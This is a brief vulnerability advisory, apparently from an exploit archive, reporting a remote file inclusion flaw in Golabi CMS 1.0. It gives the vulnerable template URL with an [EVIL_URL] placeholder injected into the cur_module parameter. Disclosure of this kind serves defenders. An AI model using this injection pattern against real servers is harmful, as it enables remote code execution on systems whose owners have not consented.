-------------------------------------------------------------------------------- _________ _____ __ \_ ___ \____________ ___________ __ / _ \ ____ ____ ____ | | / \ \/\_ __ \__ \ \___ < | |/ /_\ \ / \ / ___\_/ __ \| | \ \____| | \// __ \_/ / \___ / | \ | \/ /_/ > ___/| |__ \______ /|__| (____ /_____ \/ ____\____|__ /___| /\___ / \___ >____/ \/ \/ \/\/ \/ \//_____/ \/ -------------------------------------------------------------------------------- [wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR] -------------------------------------------------------------------------------- [Golabi CMS Remote File Inclusion Vulnerability] [+] Application Info: [*] Name: Golabi CMS [*] Author: R3dM0ve [*] HomePage: http://golabicms.sourceforge.net/ [*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr [+] Vulnerability Info: [*] Type: Remote File Inclusion (RFI) [*] Requirement: register_globals [ON] [*] Risk: High Critical [*] Bug Hunter: CrazyAngel [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论